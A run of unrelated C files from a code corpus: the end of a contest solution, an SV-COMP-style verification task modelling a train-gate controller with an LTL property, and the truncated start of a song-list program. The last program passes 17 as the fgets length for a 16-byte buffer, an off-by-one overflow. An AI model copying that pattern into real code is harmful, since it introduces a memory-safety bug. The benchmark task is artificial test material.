printf("IMPOSSIBLE");
else {
for(i=1;i<=K;i++)
printf("%d ", i);
}
}
else {
if(K-1 > S)
printf("IMPOSSIBLE");
else {
for(i=2;i<=K;i++)
printf("%d ", i);
}
}
printf("\n");
}
}
|
the_stack_data/137092.c | //@ ltl invariant negative: ( ([] ( (<> ( ( AP((gate_l1 != 0)) && (! AP((gate_l0 != 0)))) && ( (X AP((gate_l1 != 0))) && (X AP((gate_l0 != 0)))))) || (! ( ( (! AP((gate_l0 != 0))) && (! AP((gate_l1 != 0)))) && ( (! (X AP((gate_l1 != 0)))) && (X AP((gate_l0 != 0)))))))) || (! ([] (<> AP((1.0 <= _diverge_delta))))));
extern float __VERIFIER_nondet_float(void);
extern int __VERIFIER_nondet_int(void);
char __VERIFIER_nondet_bool(void) {
return __VERIFIER_nondet_int() != 0;
}
char t11_l1, _x_t11_l1;
char t11_l0, _x_t11_l0;
char t11_evt1, _x_t11_evt1;
char t11_evt0, _x_t11_evt0;
float t11_x, _x_t11_x;
char t10_l0, _x_t10_l0;
char t10_evt0, _x_t10_evt0;
float t10_x, _x_t10_x;
char t9_l1, _x_t9_l1;
char t9_l0, _x_t9_l0;
char t9_evt1, _x_t9_evt1;
char t9_evt0, _x_t9_evt0;
char t2_l1, _x_t2_l1;
char t3_evt0, _x_t3_evt0;
char t2_l0, _x_t2_l0;
char t2_evt0, _x_t2_evt0;
char t1_l1, _x_t1_l1;
float t2_x, _x_t2_x;
char t1_evt1, _x_t1_evt1;
char t1_evt0, _x_t1_evt0;
char t0_l1, _x_t0_l1;
float t1_x, _x_t1_x;
char controller_evt2, _x_controller_evt2;
char t0_l0, _x_t0_l0;
char t0_evt1, _x_t0_evt1;
char controller_l1, _x_controller_l1;
char controller_evt1, _x_controller_evt1;
char t1_l0, _x_t1_l0;
char t10_l1, _x_t10_l1;
char gate_l0, _x_gate_l0;
char t2_evt1, _x_t2_evt1;
float _diverge_delta, _x__diverge_delta;
float t3_x, _x_t3_x;
char t0_evt0, _x_t0_evt0;
char controller_l0, _x_controller_l0;
char t10_evt1, _x_t10_evt1;
char gate_evt0, _x_gate_evt0;
float t0_x, _x_t0_x;
char controller_evt0, _x_controller_evt0;
float gate_y, _x_gate_y;
char t3_l0, _x_t3_l0;
float controller_z, _x_controller_z;
int controller_cnt, _x_controller_cnt;
char t3_evt1, _x_t3_evt1;
float t4_x, _x_t4_x;
char t3_l1, _x_t3_l1;
char t4_evt0, _x_t4_evt0;
char t4_evt1, _x_t4_evt1;
char gate_evt1, _x_gate_evt1;
float t5_x, _x_t5_x;
char t4_l0, _x_t4_l0;
char t4_l1, _x_t4_l1;
char gate_l1, _x_gate_l1;
char t5_evt0, _x_t5_evt0;
char t5_evt1, _x_t5_evt1;
float delta, _x_delta;
float t6_x, _x_t6_x;
char t5_l0, _x_t5_l0;
char t5_l1, _x_t5_l1;
char t6_evt0, _x_t6_evt0;
char t6_evt1, _x_t6_evt1;
float t7_x, _x_t7_x;
char t6_l0, _x_t6_l0;
char t6_l1, _x_t6_l1;
char t7_evt0, _x_t7_evt0;
char t7_evt1, _x_t7_evt1;
float t8_x, _x_t8_x;
char t7_l0, _x_t7_l0;
char t7_l1, _x_t7_l1;
char t8_evt0, _x_t8_evt0;
char t8_evt1, _x_t8_evt1;
float t9_x, _x_t9_x;
char t8_l0, _x_t8_l0;
char t8_l1, _x_t8_l1;
int main()
{
t11_l1 = __VERIFIER_nondet_bool();
t11_l0 = __VERIFIER_nondet_bool();
t11_evt1 = __VERIFIER_nondet_bool();
t11_evt0 = __VERIFIER_nondet_bool();
t11_x = __VERIFIER_nondet_float();
t10_l0 = __VERIFIER_nondet_bool();
t10_evt0 = __VERIFIER_nondet_bool();
t10_x = __VERIFIER_nondet_float();
t9_l1 = __VERIFIER_nondet_bool();
t9_l0 = __VERIFIER_nondet_bool();
t9_evt1 = __VERIFIER_nondet_bool();
t9_evt0 = __VERIFIER_nondet_bool();
t2_l1 = __VERIFIER_nondet_bool();
t3_evt0 = __VERIFIER_nondet_bool();
t2_l0 = __VERIFIER_nondet_bool();
t2_evt0 = __VERIFIER_nondet_bool();
t1_l1 = __VERIFIER_nondet_bool();
t2_x = __VERIFIER_nondet_float();
t1_evt1 = __VERIFIER_nondet_bool();
t1_evt0 = __VERIFIER_nondet_bool();
t0_l1 = __VERIFIER_nondet_bool();
t1_x = __VERIFIER_nondet_float();
controller_evt2 = __VERIFIER_nondet_bool();
t0_l0 = __VERIFIER_nondet_bool();
t0_evt1 = __VERIFIER_nondet_bool();
controller_l1 = __VERIFIER_nondet_bool();
controller_evt1 = __VERIFIER_nondet_bool();
t1_l0 = __VERIFIER_nondet_bool();
t10_l1 = __VERIFIER_nondet_bool();
gate_l0 = __VERIFIER_nondet_bool();
t2_evt1 = __VERIFIER_nondet_bool();
_diverge_delta = __VERIFIER_nondet_float();
t3_x = __VERIFIER_nondet_float();
t0_evt0 = __VERIFIER_nondet_bool();
controller_l0 = __VERIFIER_nondet_bool();
t10_evt1 = __VERIFIER_nondet_bool();
gate_evt0 = __VERIFIER_nondet_bool();
t0_x = __VERIFIER_nondet_float();
controller_evt0 = __VERIFIER_nondet_bool();
gate_y = __VERIFIER_nondet_float();
t3_l0 = __VERIFIER_nondet_bool();
controller_z = __VERIFIER_nondet_float();
controller_cnt = __VERIFIER_nondet_int();
t3_evt1 = __VERIFIER_nondet_bool();
t4_x = __VERIFIER_nondet_float();
t3_l1 = __VERIFIER_nondet_bool();
t4_evt0 = __VERIFIER_nondet_bool();
t4_evt1 = __VERIFIER_nondet_bool();
gate_evt1 = __VERIFIER_nondet_bool();
t5_x = __VERIFIER_nondet_float();
t4_l0 = __VERIFIER_nondet_bool();
t4_l1 = __VERIFIER_nondet_bool();
gate_l1 = __VERIFIER_nondet_bool();
t5_evt0 = __VERIFIER_nondet_bool();
t5_evt1 = __VERIFIER_nondet_bool();
delta = __VERIFIER_nondet_float();
t6_x = __VERIFIER_nondet_float();
t5_l0 = __VERIFIER_nondet_bool();
t5_l1 = __VERIFIER_nondet_bool();
t6_evt0 = __VERIFIER_nondet_bool();
t6_evt1 = __VERIFIER_nondet_bool();
t7_x = __VERIFIER_nondet_float();
t6_l0 = __VERIFIER_nondet_bool();
t6_l1 = __VERIFIER_nondet_bool();
t7_evt0 = __VERIFIER_nondet_bool();
t7_evt1 = __VERIFIER_nondet_bool();
t8_x = __VERIFIER_nondet_float();
t7_l0 = __VERIFIER_nondet_bool();
t7_l1 = __VERIFIER_nondet_bool();
t8_evt0 = __VERIFIER_nondet_bool();
t8_evt1 = __VERIFIER_nondet_bool();
t9_x = __VERIFIER_nondet_float();
t8_l0 = __VERIFIER_nondet_bool();
t8_l1 = __VERIFIER_nondet_bool();
int __ok = (((((((( !(t11_l0 != 0)) && ( !(t11_l1 != 0))) && (t11_x == 0.0)) && (((( !(t11_l0 != 0)) && ( !(t11_l1 != 0))) || ((t11_l0 != 0) && ( !(t11_l1 != 0)))) || (((t11_l1 != 0) && ( !(t11_l0 != 0))) || ((t11_l0 != 0) && (t11_l1 != 0))))) && (((( !(t11_evt0 != 0)) && ( !(t11_evt1 != 0))) || ((t11_evt0 != 0) && ( !(t11_evt1 != 0)))) || (((t11_evt1 != 0) && ( !(t11_evt0 != 0))) || ((t11_evt0 != 0) && (t11_evt1 != 0))))) && ((( !(t11_l0 != 0)) && ( !(t11_l1 != 0))) || (t11_x <= 5.0))) && ((((((( !(t10_l0 != 0)) && ( !(t10_l1 != 0))) && (t10_x == 0.0)) && (((( !(t10_l0 != 0)) && ( !(t10_l1 != 0))) || ((t10_l0 != 0) && ( !(t10_l1 != 0)))) || (((t10_l1 != 0) && ( !(t10_l0 != 0))) || ((t10_l0 != 0) && (t10_l1 != 0))))) && (((( !(t10_evt0 != 0)) && ( !(t10_evt1 != 0))) || ((t10_evt0 != 0) && ( !(t10_evt1 != 0)))) || (((t10_evt1 != 0) && ( !(t10_evt0 != 0))) || ((t10_evt0 != 0) && (t10_evt1 != 0))))) && ((( !(t10_l0 != 0)) && ( !(t10_l1 != 0))) || (t10_x <= 5.0))) && ((((((( !(t9_l0 != 0)) && ( !(t9_l1 != 0))) && (t9_x == 0.0)) && (((( !(t9_l0 != 0)) && ( !(t9_l1 != 0))) || ((t9_l0 != 0) && ( !(t9_l1 != 0)))) || (((t9_l1 != 0) && ( !(t9_l0 != 0))) || ((t9_l0 != 0) && (t9_l1 != 0))))) && (((( !(t9_evt0 != 0)) && ( !(t9_evt1 != 0))) || ((t9_evt0 != 0) && ( !(t9_evt1 != 0)))) || (((t9_evt1 != 0) && ( !(t9_evt0 != 0))) || ((t9_evt0 != 0) && (t9_evt1 != 0))))) && ((( !(t9_l0 != 0)) && ( !(t9_l1 != 0))) || (t9_x <= 5.0))) && ((((((( !(t8_l0 != 0)) && ( !(t8_l1 != 0))) && (t8_x == 0.0)) && (((( !(t8_l0 != 0)) && ( !(t8_l1 != 0))) || ((t8_l0 != 0) && ( !(t8_l1 != 0)))) || (((t8_l1 != 0) && ( !(t8_l0 != 0))) || ((t8_l0 != 0) && (t8_l1 != 0))))) && (((( !(t8_evt0 != 0)) && ( !(t8_evt1 != 0))) || ((t8_evt0 != 0) && ( !(t8_evt1 != 0)))) || (((t8_evt1 != 0) && ( !(t8_evt0 != 0))) || ((t8_evt0 != 0) && (t8_evt1 != 0))))) && ((( !(t8_l0 != 0)) && ( !(t8_l1 != 0))) || (t8_x <= 5.0))) && ((((((( !(t7_l0 != 0)) && ( !(t7_l1 != 0))) && (t7_x == 0.0)) && (((( !(t7_l0 != 0)) && ( !(t7_l1 != 0))) || ((t7_l0 != 0) && ( !(t7_l1 != 0)))) || (((t7_l1 != 0) && ( !(t7_l0 != 0))) || ((t7_l0 != 0) && (t7_l1 != 0))))) && (((( !(t7_evt0 != 0)) && ( !(t7_evt1 != 0))) || ((t7_evt0 != 0) && ( !(t7_evt1 != 0)))) || (((t7_evt1 != 0) && ( !(t7_evt0 != 0))) || ((t7_evt0 != 0) && (t7_evt1 != 0))))) && ((( !(t7_l0 != 0)) && ( !(t7_l1 != 0))) || (t7_x <= 5.0))) && ((((((( !(t6_l0 != 0)) && ( !(t6_l1 != 0))) && (t6_x == 0.0)) && (((( !(t6_l0 != 0)) && ( !(t6_l1 != 0))) || ((t6_l0 != 0) && ( !(t6_l1 != 0)))) || (((t6_l1 != 0) && ( !(t6_l0 != 0))) || ((t6_l0 != 0) && (t6_l1 != 0))))) && (((( !(t6_evt0 != 0)) && ( !(t6_evt1 != 0))) || ((t6_evt0 != 0) && ( !(t6_evt1 != 0)))) || (((t6_evt1 != 0) && ( !(t6_evt0 != 0))) || ((t6_evt0 != 0) && (t6_evt1 != 0))))) && ((( !(t6_l0 != 0)) && ( !(t6_l1 != 0))) || (t6_x <= 5.0))) && ((((((( !(t5_l0 != 0)) && ( !(t5_l1 != 0))) && (t5_x == 0.0)) && (((( !(t5_l0 != 0)) && ( !(t5_l1 != 0))) || ((t5_l0 != 0) && ( !(t5_l1 != 0)))) || (((t5_l1 != 0) && ( !(t5_l0 != 0))) || ((t5_l0 != 0) && (t5_l1 != 0))))) && (((( !(t5_evt0 != 0)) && ( !(t5_evt1 != 0))) || ((t5_evt0 != 0) && ( !(t5_evt1 != 0)))) || (((t5_evt1 != 0) && ( !(t5_evt0 != 0))) || ((t5_evt0 != 0) && (t5_evt1 != 0))))) && ((( !(t5_l0 != 0)) && ( !(t5_l1 != 0))) || (t5_x <= 5.0))) && ((((((( !(t4_l0 != 0)) && ( !(t4_l1 != 0))) && (t4_x == 0.0)) && (((( !(t4_l0 != 0)) && ( !(t4_l1 != 0))) || ((t4_l0 != 0) && ( !(t4_l1 != 0)))) || (((t4_l1 != 0) && ( !(t4_l0 != 0))) || ((t4_l0 != 0) && (t4_l1 != 0))))) && (((( !(t4_evt0 != 0)) && ( !(t4_evt1 != 0))) || ((t4_evt0 != 0) && ( !(t4_evt1 != 0)))) || (((t4_evt1 != 0) && ( !(t4_evt0 != 0))) || ((t4_evt0 != 0) && (t4_evt1 != 0))))) && ((( !(t4_l0 != 0)) && ( !(t4_l1 != 0))) || (t4_x <= 5.0))) && ((((((( !(t3_l0 != 0)) && ( !(t3_l1 != 0))) && (t3_x == 0.0)) && (((( !(t3_l0 != 0)) && ( !(t3_l1 != 0))) || ((t3_l0 != 0) && ( !(t3_l1 != 0)))) || (((t3_l1 != 0) && ( !(t3_l0 != 0))) || ((t3_l0 != 0) && (t3_l1 != 0))))) && (((( !(t3_evt0 != 0)) && ( !(t3_evt1 != 0))) || ((t3_evt0 != 0) && ( !(t3_evt1 != 0)))) || (((t3_evt1 != 0) && ( !(t3_evt0 != 0))) || ((t3_evt0 != 0) && (t3_evt1 != 0))))) && ((( !(t3_l0 != 0)) && ( !(t3_l1 != 0))) || (t3_x <= 5.0))) && ((((((( !(t2_l0 != 0)) && ( !(t2_l1 != 0))) && (t2_x == 0.0)) && (((( !(t2_l0 != 0)) && ( !(t2_l1 != 0))) || ((t2_l0 != 0) && ( !(t2_l1 != 0)))) || (((t2_l1 != 0) && ( !(t2_l0 != 0))) || ((t2_l0 != 0) && (t2_l1 != 0))))) && (((( !(t2_evt0 != 0)) && ( !(t2_evt1 != 0))) || ((t2_evt0 != 0) && ( !(t2_evt1 != 0)))) || (((t2_evt1 != 0) && ( !(t2_evt0 != 0))) || ((t2_evt0 != 0) && (t2_evt1 != 0))))) && ((( !(t2_l0 != 0)) && ( !(t2_l1 != 0))) || (t2_x <= 5.0))) && ((((((( !(t1_l0 != 0)) && ( !(t1_l1 != 0))) && (t1_x == 0.0)) && (((( !(t1_l0 != 0)) && ( !(t1_l1 != 0))) || ((t1_l0 != 0) && ( !(t1_l1 != 0)))) || (((t1_l1 != 0) && ( !(t1_l0 != 0))) || ((t1_l0 != 0) && (t1_l1 != 0))))) && (((( !(t1_evt0 != 0)) && ( !(t1_evt1 != 0))) || ((t1_evt0 != 0) && ( !(t1_evt1 != 0)))) || (((t1_evt1 != 0) && ( !(t1_evt0 != 0))) || ((t1_evt0 != 0) && (t1_evt1 != 0))))) && ((( !(t1_l0 != 0)) && ( !(t1_l1 != 0))) || (t1_x <= 5.0))) && ((((((( !(t0_l0 != 0)) && ( !(t0_l1 != 0))) && (t0_x == 0.0)) && (((( !(t0_l0 != 0)) && ( !(t0_l1 != 0))) || ((t0_l0 != 0) && ( !(t0_l1 != 0)))) || (((t0_l1 != 0) && ( !(t0_l0 != 0))) || ((t0_l0 != 0) && (t0_l1 != 0))))) && (((( !(t0_evt0 != 0)) && ( !(t0_evt1 != 0))) || ((t0_evt0 != 0) && ( !(t0_evt1 != 0)))) || (((t0_evt1 != 0) && ( !(t0_evt0 != 0))) || ((t0_evt0 != 0) && (t0_evt1 != 0))))) && ((( !(t0_l0 != 0)) && ( !(t0_l1 != 0))) || (t0_x <= 5.0))) && (((((((( !(controller_l0 != 0)) && ( !(controller_l1 != 0))) && (controller_z == 0.0)) && (((( !(controller_l0 != 0)) && ( !(controller_l1 != 0))) || ((controller_l0 != 0) && ( !(controller_l1 != 0)))) || (((controller_l1 != 0) && ( !(controller_l0 != 0))) || ((controller_l0 != 0) && (controller_l1 != 0))))) && (((( !(controller_evt2 != 0)) && (( !(controller_evt0 != 0)) && ( !(controller_evt1 != 0)))) || (( !(controller_evt2 != 0)) && ((controller_evt0 != 0) && ( !(controller_evt1 != 0))))) || ((( !(controller_evt2 != 0)) && ((controller_evt1 != 0) && ( !(controller_evt0 != 0)))) || ((( !(controller_evt2 != 0)) && ((controller_evt0 != 0) && (controller_evt1 != 0))) || ((controller_evt2 != 0) && (( !(controller_evt0 != 0)) && ( !(controller_evt1 != 0)))))))) && ((((((((((((((controller_cnt == 0) || (controller_cnt == 1)) || (controller_cnt == 2)) || (controller_cnt == 3)) || (controller_cnt == 4)) || (controller_cnt == 5)) || (controller_cnt == 6)) || (controller_cnt == 7)) || (controller_cnt == 8)) || (controller_cnt == 9)) || (controller_cnt == 10)) || (controller_cnt == 11)) || (controller_cnt == 12)) || (controller_cnt == 13))) && ((controller_z <= 1.0) || ( !(((controller_l0 != 0) && ( !(controller_l1 != 0))) || ((controller_l0 != 0) && (controller_l1 != 0)))))) && (((((((( !(gate_l0 != 0)) && ( !(gate_l1 != 0))) && (gate_y == 0.0)) && (((( !(gate_l0 != 0)) && ( !(gate_l1 != 0))) || ((gate_l0 != 0) && ( !(gate_l1 != 0)))) || (((gate_l1 != 0) && ( !(gate_l0 != 0))) || ((gate_l0 != 0) && (gate_l1 != 0))))) && (((( !(gate_evt0 != 0)) && ( !(gate_evt1 != 0))) || ((gate_evt0 != 0) && ( !(gate_evt1 != 0)))) || (((gate_evt1 != 0) && ( !(gate_evt0 != 0))) || ((gate_evt0 != 0) && (gate_evt1 != 0))))) && ((gate_y <= 1.0) || ( !((gate_l0 != 0) && ( !(gate_l1 != 0)))))) && ((gate_y <= 2.0) || ( !((gate_l0 != 0) && (gate_l1 != 0))))) && (0.0 <= delta))))))))))))))) && (delta == _diverge_delta));
while (__ok) {
_x_t11_l1 = __VERIFIER_nondet_bool();
_x_t11_l0 = __VERIFIER_nondet_bool();
_x_t11_evt1 = __VERIFIER_nondet_bool();
_x_t11_evt0 = __VERIFIER_nondet_bool();
_x_t11_x = __VERIFIER_nondet_float();
_x_t10_l0 = __VERIFIER_nondet_bool();
_x_t10_evt0 = __VERIFIER_nondet_bool();
_x_t10_x = __VERIFIER_nondet_float();
_x_t9_l1 = __VERIFIER_nondet_bool();
_x_t9_l0 = __VERIFIER_nondet_bool();
_x_t9_evt1 = __VERIFIER_nondet_bool();
_x_t9_evt0 = __VERIFIER_nondet_bool();
_x_t2_l1 = __VERIFIER_nondet_bool();
_x_t3_evt0 = __VERIFIER_nondet_bool();
_x_t2_l0 = __VERIFIER_nondet_bool();
_x_t2_evt0 = __VERIFIER_nondet_bool();
_x_t1_l1 = __VERIFIER_nondet_bool();
_x_t2_x = __VERIFIER_nondet_float();
_x_t1_evt1 = __VERIFIER_nondet_bool();
_x_t1_evt0 = __VERIFIER_nondet_bool();
_x_t0_l1 = __VERIFIER_nondet_bool();
_x_t1_x = __VERIFIER_nondet_float();
_x_controller_evt2 = __VERIFIER_nondet_bool();
_x_t0_l0 = __VERIFIER_nondet_bool();
_x_t0_evt1 = __VERIFIER_nondet_bool();
_x_controller_l1 = __VERIFIER_nondet_bool();
_x_controller_evt1 = __VERIFIER_nondet_bool();
_x_t1_l0 = __VERIFIER_nondet_bool();
_x_t10_l1 = __VERIFIER_nondet_bool();
_x_gate_l0 = __VERIFIER_nondet_bool();
_x_t2_evt1 = __VERIFIER_nondet_bool();
_x__diverge_delta = __VERIFIER_nondet_float();
_x_t3_x = __VERIFIER_nondet_float();
_x_t0_evt0 = __VERIFIER_nondet_bool();
_x_controller_l0 = __VERIFIER_nondet_bool();
_x_t10_evt1 = __VERIFIER_nondet_bool();
_x_gate_evt0 = __VERIFIER_nondet_bool();
_x_t0_x = __VERIFIER_nondet_float();
_x_controller_evt0 = __VERIFIER_nondet_bool();
_x_gate_y = __VERIFIER_nondet_float();
_x_t3_l0 = __VERIFIER_nondet_bool();
_x_controller_z = __VERIFIER_nondet_float();
_x_controller_cnt = __VERIFIER_nondet_int();
_x_t3_evt1 = __VERIFIER_nondet_bool();
_x_t4_x = __VERIFIER_nondet_float();
_x_t3_l1 = __VERIFIER_nondet_bool();
_x_t4_evt0 = __VERIFIER_nondet_bool();
_x_t4_evt1 = __VERIFIER_nondet_bool();
_x_gate_evt1 = __VERIFIER_nondet_bool();
_x_t5_x = __VERIFIER_nondet_float();
_x_t4_l0 = __VERIFIER_nondet_bool();
_x_t4_l1 = __VERIFIER_nondet_bool();
_x_gate_l1 = __VERIFIER_nondet_bool();
_x_t5_evt0 = __VERIFIER_nondet_bool();
_x_t5_evt1 = __VERIFIER_nondet_bool();
_x_delta = __VERIFIER_nondet_float();
_x_t6_x = __VERIFIER_nondet_float();
_x_t5_l0 = __VERIFIER_nondet_bool();
_x_t5_l1 = __VERIFIER_nondet_bool();
_x_t6_evt0 = __VERIFIER_nondet_bool();
_x_t6_evt1 = __VERIFIER_nondet_bool();
_x_t7_x = __VERIFIER_nondet_float();
_x_t6_l0 = __VERIFIER_nondet_bool();
_x_t6_l1 = __VERIFIER_nondet_bool();
_x_t7_evt0 = __VERIFIER_nondet_bool();
_x_t7_evt1 = __VERIFIER_nondet_bool();
_x_t8_x = __VERIFIER_nondet_float();
_x_t7_l0 = __VERIFIER_nondet_bool();
_x_t7_l1 = __VERIFIER_nondet_bool();
_x_t8_evt0 = __VERIFIER_nondet_bool();
_x_t8_evt1 = __VERIFIER_nondet_bool();
_x_t9_x = __VERIFIER_nondet_float();
_x_t8_l0 = __VERIFIER_nondet_bool();
_x_t8_l1 = __VERIFIER_nondet_bool();
__ok = ((((((((((((((((((((((((((((( !(_x_t11_l0 != 0)) && ( !(_x_t11_l1 != 0))) || ((_x_t11_l0 != 0) && ( !(_x_t11_l1 != 0)))) || (((_x_t11_l1 != 0) && ( !(_x_t11_l0 != 0))) || ((_x_t11_l0 != 0) && (_x_t11_l1 != 0)))) && (((( !(_x_t11_evt0 != 0)) && ( !(_x_t11_evt1 != 0))) || ((_x_t11_evt0 != 0) && ( !(_x_t11_evt1 != 0)))) || (((_x_t11_evt1 != 0) && ( !(_x_t11_evt0 != 0))) || ((_x_t11_evt0 != 0) && (_x_t11_evt1 != 0))))) && ((( !(_x_t11_l0 != 0)) && ( !(_x_t11_l1 != 0))) || (_x_t11_x <= 5.0))) && (((((t11_l0 != 0) == (_x_t11_l0 != 0)) && ((t11_l1 != 0) == (_x_t11_l1 != 0))) && ((delta + (t11_x + (-1.0 * _x_t11_x))) == 0.0)) || ( !(( !(delta <= 0.0)) || (( !(t11_evt0 != 0)) && ( !(t11_evt1 != 0))))))) && (((((_x_t11_l0 != 0) && ( !(_x_t11_l1 != 0))) && ((t11_evt0 != 0) && ( !(t11_evt1 != 0)))) && (_x_t11_x == 0.0)) || ( !((( !(t11_l0 != 0)) && ( !(t11_l1 != 0))) && ((delta == 0.0) && ( !(( !(t11_evt0 != 0)) && ( !(t11_evt1 != 0))))))))) && (((((_x_t11_l1 != 0) && ( !(_x_t11_l0 != 0))) && ( !(t11_x <= 2.0))) && (((t11_evt0 != 0) && (t11_evt1 != 0)) && (t11_x == _x_t11_x))) || ( !(((t11_l0 != 0) && ( !(t11_l1 != 0))) && ((delta == 0.0) && ( !(( !(t11_evt0 != 0)) && ( !(t11_evt1 != 0))))))))) && (((t11_x == _x_t11_x) && (((_x_t11_l0 != 0) && (_x_t11_l1 != 0)) && ((t11_evt0 != 0) && (t11_evt1 != 0)))) || ( !(((t11_l1 != 0) && ( !(t11_l0 != 0))) && ((delta == 0.0) && ( !(( !(t11_evt0 != 0)) && ( !(t11_evt1 != 0))))))))) && ((((( !(_x_t11_l0 != 0)) && ( !(_x_t11_l1 != 0))) && (t11_x <= 5.0)) && (((t11_evt1 != 0) && ( !(t11_evt0 != 0))) && (t11_x == _x_t11_x))) || ( !(((t11_l0 != 0) && (t11_l1 != 0)) && ((delta == 0.0) && ( !(( !(t11_evt0 != 0)) && ( !(t11_evt1 != 0))))))))) && (((((((((((( !(_x_t10_l0 != 0)) && ( !(_x_t10_l1 != 0))) || ((_x_t10_l0 != 0) && ( !(_x_t10_l1 != 0)))) || (((_x_t10_l1 != 0) && ( !(_x_t10_l0 != 0))) || ((_x_t10_l0 != 0) && (_x_t10_l1 != 0)))) && (((( !(_x_t10_evt0 != 0)) && ( !(_x_t10_evt1 != 0))) || ((_x_t10_evt0 != 0) && ( !(_x_t10_evt1 != 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|| ( !((delta == 0.0) && ( !(( !(t9_evt0 != 0)) && ( !(t9_evt1 != 0)))))))) && ((( !(t11_evt0 != 0)) && ( !(t11_evt1 != 0))) || ( !((delta == 0.0) && ( !(( !(t10_evt0 != 0)) && ( !(t10_evt1 != 0)))))))) && ((( !(t10_evt0 != 0)) && ( !(t10_evt1 != 0))) || ( !((delta == 0.0) && ( !(( !(t11_evt0 != 0)) && ( !(t11_evt1 != 0)))))))) && ((((gate_evt0 != 0) && ( !(gate_evt1 != 0))) == (( !(controller_evt2 != 0)) && ((controller_evt0 != 0) && (controller_evt1 != 0)))) || ( !(delta == 0.0)))) && (( !(delta == 0.0)) || (((gate_evt1 != 0) && ( !(gate_evt0 != 0))) == ((controller_evt2 != 0) && (( !(controller_evt0 != 0)) && ( !(controller_evt1 != 0))))))) && (( !(delta == 0.0)) || ((( !(controller_evt2 != 0)) && ((controller_evt0 != 0) && ( !(controller_evt1 != 0)))) == (((t11_evt0 != 0) && ( !(t11_evt1 != 0))) || (((t10_evt0 != 0) && ( !(t10_evt1 != 0))) || (((t9_evt0 != 0) && ( !(t9_evt1 != 0))) || (((t8_evt0 != 0) && ( !(t8_evt1 != 0))) || (((t7_evt0 != 0) && ( !(t7_evt1 != 0))) || (((t6_evt0 != 0) && ( !(t6_evt1 != 0))) || (((t5_evt0 != 0) && ( !(t5_evt1 != 0))) || (((t4_evt0 != 0) && ( !(t4_evt1 != 0))) || (((t3_evt0 != 0) && ( !(t3_evt1 != 0))) || (((t2_evt0 != 0) && ( !(t2_evt1 != 0))) || (((t0_evt0 != 0) && ( !(t0_evt1 != 0))) || ((t1_evt0 != 0) && ( !(t1_evt1 != 0))))))))))))))))) && (( !(delta == 0.0)) || ((( !(controller_evt2 != 0)) && ((controller_evt1 != 0) && ( !(controller_evt0 != 0)))) == (((t11_evt1 != 0) && ( !(t11_evt0 != 0))) || (((t10_evt1 != 0) && ( !(t10_evt0 != 0))) || (((t9_evt1 != 0) && ( !(t9_evt0 != 0))) || (((t8_evt1 != 0) && ( !(t8_evt0 != 0))) || (((t7_evt1 != 0) && ( !(t7_evt0 != 0))) || (((t6_evt1 != 0) && ( !(t6_evt0 != 0))) || (((t5_evt1 != 0) && ( !(t5_evt0 != 0))) || (((t4_evt1 != 0) && ( !(t4_evt0 != 0))) || (((t3_evt1 != 0) && ( !(t3_evt0 != 0))) || (((t2_evt1 != 0) && ( !(t2_evt0 != 0))) || (((t0_evt1 != 0) && ( !(t0_evt0 != 0))) || ((t1_evt1 != 0) && ( !(t1_evt0 != 0))))))))))))))))) && (((delta == _x__diverge_delta) || ( !(1.0 <= _diverge_delta))) && ((1.0 <= _diverge_delta) || ((delta + (_diverge_delta + (-1.0 * _x__diverge_delta))) == 0.0))));
t11_l1 = _x_t11_l1;
t11_l0 = _x_t11_l0;
t11_evt1 = _x_t11_evt1;
t11_evt0 = _x_t11_evt0;
t11_x = _x_t11_x;
t10_l0 = _x_t10_l0;
t10_evt0 = _x_t10_evt0;
t10_x = _x_t10_x;
t9_l1 = _x_t9_l1;
t9_l0 = _x_t9_l0;
t9_evt1 = _x_t9_evt1;
t9_evt0 = _x_t9_evt0;
t2_l1 = _x_t2_l1;
t3_evt0 = _x_t3_evt0;
t2_l0 = _x_t2_l0;
t2_evt0 = _x_t2_evt0;
t1_l1 = _x_t1_l1;
t2_x = _x_t2_x;
t1_evt1 = _x_t1_evt1;
t1_evt0 = _x_t1_evt0;
t0_l1 = _x_t0_l1;
t1_x = _x_t1_x;
controller_evt2 = _x_controller_evt2;
t0_l0 = _x_t0_l0;
t0_evt1 = _x_t0_evt1;
controller_l1 = _x_controller_l1;
controller_evt1 = _x_controller_evt1;
t1_l0 = _x_t1_l0;
t10_l1 = _x_t10_l1;
gate_l0 = _x_gate_l0;
t2_evt1 = _x_t2_evt1;
_diverge_delta = _x__diverge_delta;
t3_x = _x_t3_x;
t0_evt0 = _x_t0_evt0;
controller_l0 = _x_controller_l0;
t10_evt1 = _x_t10_evt1;
gate_evt0 = _x_gate_evt0;
t0_x = _x_t0_x;
controller_evt0 = _x_controller_evt0;
gate_y = _x_gate_y;
t3_l0 = _x_t3_l0;
controller_z = _x_controller_z;
controller_cnt = _x_controller_cnt;
t3_evt1 = _x_t3_evt1;
t4_x = _x_t4_x;
t3_l1 = _x_t3_l1;
t4_evt0 = _x_t4_evt0;
t4_evt1 = _x_t4_evt1;
gate_evt1 = _x_gate_evt1;
t5_x = _x_t5_x;
t4_l0 = _x_t4_l0;
t4_l1 = _x_t4_l1;
gate_l1 = _x_gate_l1;
t5_evt0 = _x_t5_evt0;
t5_evt1 = _x_t5_evt1;
delta = _x_delta;
t6_x = _x_t6_x;
t5_l0 = _x_t5_l0;
t5_l1 = _x_t5_l1;
t6_evt0 = _x_t6_evt0;
t6_evt1 = _x_t6_evt1;
t7_x = _x_t7_x;
t6_l0 = _x_t6_l0;
t6_l1 = _x_t6_l1;
t7_evt0 = _x_t7_evt0;
t7_evt1 = _x_t7_evt1;
t8_x = _x_t8_x;
t7_l0 = _x_t7_l0;
t7_l1 = _x_t7_l1;
t8_evt0 = _x_t8_evt0;
t8_evt1 = _x_t8_evt1;
t9_x = _x_t9_x;
t8_l0 = _x_t8_l0;
t8_l1 = _x_t8_l1;
}
}
|
the_stack_data/18265.c | #include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char const *argv[])
{
char entradaDoUsuario[16];
int n,i;
fgets(entradaDoUsuario, 16 + 1, stdin);
n = atoi(entradaDoUsuario);
char musicas[11][16];
strcpy(musicas[0], "PROXYCITY");
strcpy(musicas[1], "P.Y.N.G.");
strcpy(musicas[2], "DNSUEY!");
strcpy(musicas[3], "SERVERS");
strcpy(musicas[4], "HOST!");
strcpy(musicas[5], "CRIPTONIZE");
strcpy(musicas[6], "OFFLINE DAY");
strcpy(musicas[7], "SALT");
strcpy(musicas[8], "ANSWER!");
strcpy(musicas[9], "RAR?");
strcpy(musicas[10], "WIFI ANTENNAS");
int entradas[2];
for (i = 0; i < n; i++)
{
